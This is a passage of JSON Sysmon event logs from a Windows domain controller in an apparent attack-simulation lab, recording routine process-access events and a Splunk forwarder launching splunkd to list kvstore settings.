C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.228\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.228","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010F4840500}\r\nTargetProcessId: 3444\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010F4840500}","TargetProcessId":"3444","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.247\r\nProcessGuid: {E2A3D6B1-1104-5F25-0000-0010A9850500}\r\nProcessId: 3288\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1104-5F25-0000-0010F4840500}\r\nParentProcessId: 3444\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.247","ProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010A9850500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1104-5F25-0000-0010F4840500}","ParentProcessId":"3444","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list kvstore --no-log","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-1104-5F25-0000-0010F4840500}\r\nSourceProcessId: 3444\r\nSourceThreadId: 3296\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010A9850500}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010F4840500}","SourceProcessId":"3444","SourceThreadId":"3296","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010A9850500}","TargetProcessId":"3288","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1104-5F25-0000-0010A9850500}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1104-5F25-0000-0010A9850500}","TargetProcessId":"3288","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:48.243","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:48.243\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 